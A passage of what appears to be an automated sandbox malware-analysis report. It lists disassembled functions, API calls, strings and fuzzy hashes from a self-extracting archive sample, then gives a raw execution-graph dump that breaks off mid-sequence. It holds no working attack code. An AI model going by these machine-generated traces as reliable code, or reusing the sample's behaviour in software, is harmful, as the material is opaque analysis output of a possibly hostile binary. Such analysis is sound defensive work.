                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_ShowWindow
                                                                                              • String ID: qI
                                                                                              • API String ID: 4203566401-2428486414
                                                                                              • Opcode ID: b07d146d358698b5f5d21e7127f56af8cfedbe6839a6fd99d40a2cd55d68c885
                                                                                              • Instruction ID: 592eac6332cd04ed09db2d8032f6f8a544b88580bf268ea83086bd44cb726404
                                                                                              • Opcode Fuzzy Hash: b07d146d358698b5f5d21e7127f56af8cfedbe6839a6fd99d40a2cd55d68c885
                                                                                              • Instruction Fuzzy Hash: ED415C31A10629AFDB05EFA9DC88A9DBBB5BF4C314B049059F609B7260DB71AC05CF90
                                                                                              Function 00E83D64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_
                                                                                              • String ID: Software\WinRAR SFX$jL
                                                                                              • API String ID: 2427045233-923024267
                                                                                              • Opcode ID: 09ffe2ff2d00044c70c7e1f3aa029aeaca64123978482f80b5329357faf73fb6
                                                                                              • Instruction ID: db37d83327c4be846c296f08b4a718a0f16557f3c650da3a182bd6f428b39dc3
                                                                                              • Opcode Fuzzy Hash: 09ffe2ff2d00044c70c7e1f3aa029aeaca64123978482f80b5329357faf73fb6
                                                                                              • Instruction Fuzzy Hash: A9214B71900208EFDB21EFA5DD89EEEBBB9FB88B00F10551AF509B2250D7719A44CB60
                                                                                              Function 00E80110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E8017B
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E801B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: 79154dc63e7956a78349a4bae8212f9ca036a4317cb83ef5322da935d17aedb5
                                                                                              • Instruction ID: 5b945cc07c34bc61448fdfc3f6db179e0a60a1204654155fd42626678675e662
                                                                                              • Opcode Fuzzy Hash: 79154dc63e7956a78349a4bae8212f9ca036a4317cb83ef5322da935d17aedb5
                                                                                              • Instruction Fuzzy Hash: 9611E6B26463147BE2B1AA249C49FFB77ECEB89714F401429F74DB3180C771A8498775
                                                                                              Function 00E75109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E75094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E750B3
                                                                                                • Part of subcall function 00E75094: GetProcAddress.KERNEL32(00EB51F8,CryptUnprotectMemory), ref: 00E750C3
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00E75104), ref: 00E75197
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 00E7518F
                                                                                              • CryptProtectMemory failed, xrefs: 00E7514E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              • Opcode ID: 62ae557b13b1597a8c8bf8bb2c6a1e837580836124f2f62ccc64f13edc7d3ca2
                                                                                              • Instruction ID: 2782e831c608fe4673966e928a646c319a227199cbdb22d3416005e24af7f71a
                                                                                              • Opcode Fuzzy Hash: 62ae557b13b1597a8c8bf8bb2c6a1e837580836124f2f62ccc64f13edc7d3ca2
                                                                                              • Instruction Fuzzy Hash: F9113333A03E24ABDB16AF21AC01BAE3B68AB40765B449116FC197B261CBB09D0186D0
                                                                                              Function 00E7FEA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00020008,?), ref: 00E7FEB6
                                                                                              • GetLastError.KERNEL32 ref: 00E7FEE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentErrorLastProcess
                                                                                              • String ID: $L
                                                                                              • API String ID: 335030130-1469215623
                                                                                              • Opcode ID: b525e12d4b0822b47479b413fbbcd29d72a8c2203d873e2d03463df6bf72d7b1
                                                                                              • Instruction ID: e8bf30c00c1af68a5d2efbdc32272a767978e6e7b6054a15df94158b5489640d
                                                                                              • Opcode Fuzzy Hash: b525e12d4b0822b47479b413fbbcd29d72a8c2203d873e2d03463df6bf72d7b1
                                                                                              • Instruction Fuzzy Hash: B5016D72604208BFDB11AFA1AC49EEF7BAEEB05354F105166F509F1050DB718E449A20
                                                                                              Function 00E84264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(0001043E), ref: 00E84291
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001043E,00E80110,?), ref: 00E842BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
                                                                                              • Opcode ID: 0718d83b927f9a9a0eafb43183e7960574d6e376e73fa7143a70aa5b4f8a0d86
                                                                                              • Instruction ID: 72c6916a87abd8433d755a1a9d64c382d1080d9b6d0cda1f3d59a60971d30d79
                                                                                              • Opcode Fuzzy Hash: 0718d83b927f9a9a0eafb43183e7960574d6e376e73fa7143a70aa5b4f8a0d86
                                                                                              • Instruction Fuzzy Hash: 6901497228A715BFC711BB65AC66F9737C8EB02344B047215F84DB32E1C6A05844CB60
                                                                                              Function 00E775ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00E7770A,?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775F3
                                                                                              • GetLastError.KERNEL32(?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775FF
                                                                                                • Part of subcall function 00E692EB: __EH_prolog3_GS.LIBCMT ref: 00E692F2
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E77608
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 2419225763-2248577382
                                                                                              • Opcode ID: e97f06d738ec9940584dc35963b52f50899f89ab0ab6cc17aaf433e40f92ceff
                                                                                              • Instruction ID: 7abf295657b9d61fff592f99407924846e55067fffc72beaadc2008768641462
                                                                                              • Opcode Fuzzy Hash: e97f06d738ec9940584dc35963b52f50899f89ab0ab6cc17aaf433e40f92ceff
                                                                                              • Instruction Fuzzy Hash: 71D05E7154C531BBDA10337A7C4ACAF79099B56370F601756F638752FADA20088182A9
                                                                                              Function 00E73E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,522FB702), ref: 00E73E65
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00E73E73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: 2188fce180ba8b64a31947446be7b004549fd9b59c84e37319dd707a4fd38628
                                                                                              • Instruction ID: ad8d16d5c84792d9f1e02a61d75f1cf00a3ce4c6c0714895586d5f2f2fb8e177
                                                                                              • Opcode Fuzzy Hash: 2188fce180ba8b64a31947446be7b004549fd9b59c84e37319dd707a4fd38628
                                                                                              • Instruction Fuzzy Hash: B5C080317403109EE77037727C0DB872D589B04715F15145FB509B94C0D5E5D4548BF1

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.8%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:1.8%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:58
                                                                                              execution_graph 97115 d71876 97118 d8016b 97115->97118 97117 d7187d 97120 d80170 ___std_exception_copy 97118->97120 97119 d8018a 97119->97117 97120->97119 97123 d8018c 97120->97123 97127 d8523d 7 API calls 2 library calls 97120->97127 97122 d809fd 97129 d83634 RaiseException 97122->97129 97123->97122 97128 d83634 RaiseException 97123->97128 97125 d80a1a 97125->97117 97127->97120 97128->97122 97129->97125 97130 dbe5f8 GetUserNameW 97131 dbe610 97130->97131 97132 d61033 97137 d66686 97132->97137 97136 d61042 97145 d6bf07 97137->97145 97142 d66791 97143 d61038 97142->97143 97153 d668e6 8 API calls __fread_nolock 97142->97153 97144 d80433 29 API calls __onexit 97143->97144 97144->97136 97154 d8019b 97145->97154 97147 d6bf1c 97148 d8016b 8 API calls 97147->97148 97149 d666f4 97148->97149 97150 d655cc 97149->97150 97166 d655f8 97150->97166 97153->97142 97155 d8016b ___std_exception_copy 97154->97155 97156 d8018a 97155->97156 97159 d8018c 97155->97159 97163 d8523d 7 API calls 2 library calls 97155->97163 97156->97147 97158 d809fd 97165 d83634 RaiseException 97158->97165 97159->97158 97164 d83634 RaiseException 97159->97164 97161 d80a1a 97161->97147 97163->97155 97164->97158 97165->97161 97167 d65605 97166->97167 97169 d655eb 97166->97169 97168 d6560c RegOpenKeyExW 97167->97168 97167->97169 97168->97169 97170 d65626 RegQueryValueExW 97168->97170 97169->97142 97171 d65647 97170->97171 97172 d6565c RegCloseKey 97170->97172 97171->97172 97172->97169 97173 dbe71e LoadLibraryA 97174 dbe747 97173->97174 97175 dbe737 GetProcAddress 97173->97175 97176 dbe762 FreeLibrary 97174->97176 97177 dbe610 97174->97177 97175->97174 97176->97177 97178 dbe6dd 97180 dbe68a 97178->97180 97181 dce753 SHGetFolderPathW 97180->97181 97184 d684b7 97181->97184 97183 dce780 97183->97180 97185 da65bb 97184->97185 97186 d684c7 _wcslen 97184->97186 97197 d696d9 97185->97197 97189 d68502 97186->97189 97190 d684dd 97186->97190 97188 da65c4 97188->97188 97191 d8016b 8 API calls 97189->97191 97196 d68894 8 API calls 97190->97196 97194 d6850e 97191->97194 97193 d684e5 __fread_nolock 97193->97183 97195 d8019b 8 API calls 97194->97195 97195->97193 97196->97193 97198 d696e7 97197->97198 97200 d696f0 __fread_nolock 97197->97200 97198->97200 97201 d6c269 97198->97201 97200->97188 97202 d6c27c 97201->97202 97203 d6c279 __fread_nolock 97201->97203 97204 d8016b 8 API calls 97202->97204 97203->97200 97205 d6c287 97204->97205 97206 d8019b 8 API calls 97205->97206 97206->97203 97207 d6f470 97210 d79fa5 97207->97210 97209 d6f47c 97211 d79fc6 97210->97211 97212 d7a023 97210->97212 97211->97212 97219 d702f0 97211->97219 97217 d7a067 97212->97217 97246 dd3ef6 81 API calls __wsopen_s 97212->97246 97215 db800f 97215->97215 97216 d79ff7 97216->97212 97216->97217 97242 d6be6d 97216->97242 97217->97209 97238 d70326 ISource 97219->97238 97220 d805d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97220->97238 97221 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97221->97238 97222 db62cf 97261 dd3ef6 81 API calls __wsopen_s 97222->97261 97224 d71645 97230 d6be6d 8 API calls 97224->97230 97236 d7044d ISource 97224->97236 97225 d8016b 8 API calls 97225->97238 97227 db61fe 97260 dd3ef6 81 API calls __wsopen_s 97227->97260 97228 d6be6d 8 API calls 97228->97238 97229 db5c7f 97234 d6be6d 8 API calls 97229->97234 97229->97236 97230->97236 97234->97236 97235 d6bf07 8 API calls 97235->97238 97236->97216 97237 d80433 29 API calls pre_c_initialization 97237->97238 97238->97220 97238->97221 97238->97222 97238->97224 97238->97225 97238->97227 97238->97228 97238->97229 97238->97235 97238->97236 97238->97237 97239 db60b9 97238->97239 97241 d70a5e ISource 97238->97241 97247 d71e00 97238->97247 97257 d71940 254 API calls 2 library calls 97238->97257 97258 dd3ef6 81 API calls __wsopen_s 97239->97258 97259 dd3ef6 81 API calls __wsopen_s 97241->97259 97243 d6be81 97242->97243 97245 d6be90 __fread_nolock 97242->97245 97244 d8019b 8 API calls 97243->97244 97243->97245 97244->97245 97245->97212 97246->97215 97248 d71e1d ISource 97247->97248 97249 d724c2 97248->97249 97251 d71fa7 ISource 97248->97251 97253 db77db 97248->97253 97256 db760f 97248->97256 97263 d7e29c 97248->97263 97249->97251 97269 d7bd82 39 API calls 97249->97269 97251->97238 97253->97251 97268 d8d2f5 39 API calls 97253->97268 97262 d8d2f5 39 API calls 97256->97262 97257->97238 97258->97241 97259->97236 97260->97236 97261->97236 97262->97256 97264 d7e2a4 97263->97264 97265 d7e2c8 97264->97265 97270 d6c700 97264->97270 97265->97248 97267 d7e2af ISource 97267->97248 97268->97251 97269->97251 97271 d6c70b 97270->97271 97272 db1228 97271->97272 97277 d6c713 ISource 97271->97277 97273 d8016b 8 API calls 97272->97273 97275 db1234 97273->97275 97274 d6c71a 97274->97267 97277->97274 97278 d6c780 97277->97278 97279 d6c78b ISource 97278->97279 97280 d7e29c 8 API calls 97279->97280 97281 d6c7c6 ISource 97279->97281 97280->97281 97281->97277 97282 d7f9b1 97283 d7f9bb 97282->97283 97288 d7f9dc 97282->97288 97291 d6c34b 97283->97291 97285 d7f9cb 97287 d6c34b 8 API calls 97285->97287 97290 d7f9db 97287->97290 97289 dbfadc 97288->97289 97299 dc55d9 8 API calls ISource 97288->97299 97292 d6c359 97291->97292 97298 d6c381 ISource 97291->97298 97293 d6c367 97292->97293 97295 d6c34b 8 API calls 97292->97295 97294 d6c36d 97293->97294 97296 d6c34b 8 API calls 97293->97296 97297 d6c780 8 API calls 97294->97297 97294->97298 97295->97293 97296->97294 97297->97298 97298->97285 97299->97288 97300 db3fb3 97316 d6ee60 ISource 97300->97316 97301 d6f1c1 PeekMessageW 97301->97316 97302 d6eeb7 GetInputState 97302->97301 97302->97316 97304 db3271 TranslateAcceleratorW 97304->97316 97305 d6f23f PeekMessageW 97305->97316 97306 d6f0b4 timeGetTime 97306->97316 97307 d6f223 TranslateMessage DispatchMessageW 97307->97305 97308 d6f25f Sleep 97308->97316 97309 db4127 Sleep 97323 db4004 97309->97323 97311 db338d timeGetTime 97439 d7a9e5 9 API calls 97311->97439 97315 db41be GetExitCodeProcess 97318 db41ea CloseHandle 97315->97318 97319 db41d4 WaitForSingleObject 97315->97319 97316->97301 97316->97302 97316->97304 97316->97305 97316->97306 97316->97307 97316->97308 97316->97309 97316->97311 97321 d6f085 97316->97321 97316->97323 97329 d702f0 254 API calls 97316->97329 97332 d6f400 97316->97332 97339 d6f680 97316->97339 97362 d72ad0 97316->97362 97433 d7f2a5 97316->97433 97438 d7f27e timeGetTime 97316->97438 97440 dd4384 8 API calls 97316->97440 97441 dd3ef6 81 API calls __wsopen_s 97316->97441 97317 df331e GetForegroundWindow 97317->97323 97318->97323 97319->97316 97319->97318 97322 db3cf5 97322->97321 97323->97315 97323->97316 97323->97317 97323->97322 97324 db425c Sleep 97323->97324 97442 de5fb5 8 API calls 97323->97442 97443 dcf1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97323->97443 97444 d7f27e timeGetTime 97323->97444 97445 dcdc9c CreateToolhelp32Snapshot Process32FirstW 97323->97445 97324->97316 97329->97316 97333 d6f433 97332->97333 97334 d6f41f 97332->97334 97487 dd3ef6 81 API calls __wsopen_s 97333->97487 97455 d6e910 97334->97455 97336 d6f42a 97336->97316 97338 db4528 97338->97338 97340 d6f6c0 97339->97340 97356 d6f78c ISource 97340->97356 97500 d805d2 5 API calls __Init_thread_wait 97340->97500 97343 db457d 97345 d6bf07 8 API calls 97343->97345 97343->97356 97344 d6bf07 8 API calls 97344->97356 97346 db4597 97345->97346 97501 d80433 29 API calls __onexit 97346->97501 97350 db45a1 97502 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97350->97502 97354 d6be6d 8 API calls 97354->97356 97355 d702f0 254 API calls 97355->97356 97356->97344 97356->97354 97356->97355 97357 d6fa91 97356->97357 97358 d71c50 8 API calls 97356->97358 97360 dd3ef6 81 API calls 97356->97360 97495 d6bdc1 97356->97495 97499 d7b2d6 254 API calls 97356->97499 97503 d805d2 5 API calls __Init_thread_wait 97356->97503 97504 d80433 29 API calls __onexit 97356->97504 97505 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97356->97505 97506 de5131 101 API calls 97356->97506 97507 de721e 254 API calls 97356->97507 97357->97316 97358->97356 97360->97356 97363 d72b36 97362->97363 97364 d72f70 97362->97364 97366 db7b7c 97363->97366 97367 d72b50 97363->97367 97894 d805d2 5 API calls __Init_thread_wait 97364->97894 97904 de79f9 254 API calls 97366->97904 97541 d730e0 97367->97541 97369 d72f7a 97373 d72fbb 97369->97373 97895 d6b25f 97369->97895 97372 db7b88 97372->97316 97378 db7b91 97373->97378 97379 d72fec 97373->97379 97375 d730e0 9 API calls 97376 d72b76 97375->97376 97376->97373 97377 d72bac 97376->97377 97377->97378 97403 d72bc8 __fread_nolock 97377->97403 97905 dd3ef6 81 API calls __wsopen_s 97378->97905 97381 d6b3fe 8 API calls 97379->97381 97383 d72ff9 97381->97383 97382 d72f94 97901 d80588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97382->97901 97902 d7e662 254 API calls 97383->97902 97386 db7bb9 97906 dd3ef6 81 API calls __wsopen_s 97386->97906 97388 d72cef 97389 db7c1c 97388->97389 97390 d72cfc 97388->97390 97908 de60a2 53 API calls _wcslen 97389->97908 97391 d730e0 9 API calls 97390->97391 97393 d72d09 97391->97393 97396 db7d45 97393->97396 97398 d730e0 9 API calls 97393->97398 97394 d8016b 8 API calls 97394->97403 97395 d8019b 8 API calls 97395->97403 97408 db7bb4 97396->97408 97909 dd3ef6 81 API calls __wsopen_s 97396->97909 97397 d73032 97903 d7fe59 8 API calls 97397->97903 97404 d72d23 97398->97404 97401 d7306d 97401->97316 97402 d702f0 254 API calls 97402->97403 97403->97383 97403->97386 97403->97388 97403->97394 97403->97395 97403->97402 97405 db7bfd 97403->97405 97403->97408 97404->97396 97407 d6be6d 8 API calls 97404->97407 97410 d72d87 ISource 97404->97410 97907 dd3ef6 81 API calls __wsopen_s 97405->97907 97407->97410 97408->97316 97409 d730e0 9 API calls 97409->97410 97410->97396 97410->97397 97410->97408 97410->97409 97413 d72e3b ISource 97410->97413 97551 dd874a 97410->97551 97578 decd16 97410->97578 97667 dea5ac 97410->97667 97675 deac49 97410->97675 97680 ddde5d 97410->97680 97685 dd65b4 97410->97685 97690 d67953 97410->97690 97694 dd4ad5 97410->97694 97699 dd6561 97410->97699 97706 dce9c5 GetFileAttributesW 97410->97706 97708 dea4b4 97410->97708 97714 deeb63 97410->97714 97750 d7be75 97410->97750 97807 d7f95e 97410->97807 97814 dd8e39 97410->97814 97833 dd6d2d 97410->97833 97846 dd5ed5 97410->97846 97876 dd95f6 97410->97876 97891 de9eea 97410->97891 97411 d72edd 97411->97316 97412 d7e29c 8 API calls 97412->97413 97413->97411 97413->97412 97434 d7f2b8 97433->97434 97435 d7f2c1 97433->97435 97434->97316 97435->97434 97436 d7f2e5 IsDialogMessageW 97435->97436 97437 dbf83b GetClassLongW 97435->97437 97436->97434 97436->97435 97437->97435 97437->97436 97438->97316 97439->97316 97440->97316 97441->97316 97442->97323 97443->97323 97444->97323 98743 dce723 97445->98743 97447 dcdce9 Process32NextW 97448 dcdd9b CloseHandle 97447->97448 97454 dcdce2 97447->97454 97448->97323 97449 d6bf07 8 API calls 97449->97454 97450 d6b25f 8 API calls 97450->97454 97451 d6694e 8 API calls 97451->97454 97452 d67af4 8 API calls 97452->97454 97453 d7e2e5 41 API calls 97453->97454 97454->97447 97454->97448 97454->97449 97454->97450 97454->97451 97454->97452 97454->97453 97456 d702f0 254 API calls 97455->97456 97459 d6e94d 97456->97459 97458 d6e9bb ISource 97458->97336 97459->97458 97460 d6ed85 97459->97460 97461 d6ea73 97459->97461 97467 d6eb68 97459->97467 97470 d8016b 8 API calls 97459->97470 97473 db3176 97459->97473 97482 d6ead9 ISource __fread_nolock 97459->97482 97460->97458 97471 d8019b 8 API calls 97460->97471 97461->97460 97463 d6ea7e 97461->97463 97462 d6ecaf 97464 d6ecc4 97462->97464 97465 db3167 97462->97465 97466 d8016b 8 API calls 97463->97466 97468 d8016b 8 API calls 97464->97468 97493 de6062 8 API calls 97465->97493 97476 d6ea85 __fread_nolock 97466->97476 97472 d8019b 8 API calls 97467->97472 97479 d6eb1a 97468->97479 97470->97459 97471->97476 97472->97482 97494 dd3ef6 81 API calls __wsopen_s 97473->97494 97474 d8016b 8 API calls 97475 d6eaa6 97474->97475 97475->97482 97488 d6d210 254 API calls 97475->97488 97476->97474 97476->97475 97478 db3156 97492 dd3ef6 81 API calls __wsopen_s 97478->97492 97479->97336 97482->97462 97482->97478 97482->97479 97483 db3131 97482->97483 97485 db310f 97482->97485 97489 d64485 254 API calls 97482->97489 97491 dd3ef6 81 API calls __wsopen_s 97483->97491 97490 dd3ef6 81 API calls __wsopen_s 97485->97490 97487->97338 97488->97482 97489->97482 97490->97479 97491->97479 97492->97479 97493->97473 97494->97458 97496 d6bdcc 97495->97496 97497 d6bdfb 97496->97497 97508 d6bf39 97496->97508 97497->97356 97499->97356 97500->97343 97501->97350 97502->97356 97503->97356 97504->97356 97505->97356 97506->97356 97507->97356 97525 d6cf30 97508->97525 97510 d6bf49 97511 d6bf57 97510->97511 97512 db0d59 97510->97512 97514 d8016b 8 API calls 97511->97514 97534 d6b3fe 97512->97534 97516 d6bf68 97514->97516 97515 db0d64 97517 d6bf07 8 API calls 97516->97517 97518 d6bf72 97517->97518 97519 d6bf81 97518->97519 97521 d6be6d 8 API calls 97518->97521 97520 d8016b 8 API calls 97519->97520 97522 d6bf8b 97520->97522 97521->97519 97533 d6be0f 39 API calls 97522->97533 97524 d6bfaf 97524->97497 97526 d6d177 97525->97526 97531 d6cf43 97525->97531 97526->97510 97528 d6bf07 8 API calls 97528->97531 97529 d6cfed 97529->97510 97531->97528 97531->97529 97538 d805d2 5 API calls __Init_thread_wait 97531->97538 97539 d80433 29 API calls __onexit 97531->97539 97540 d80588 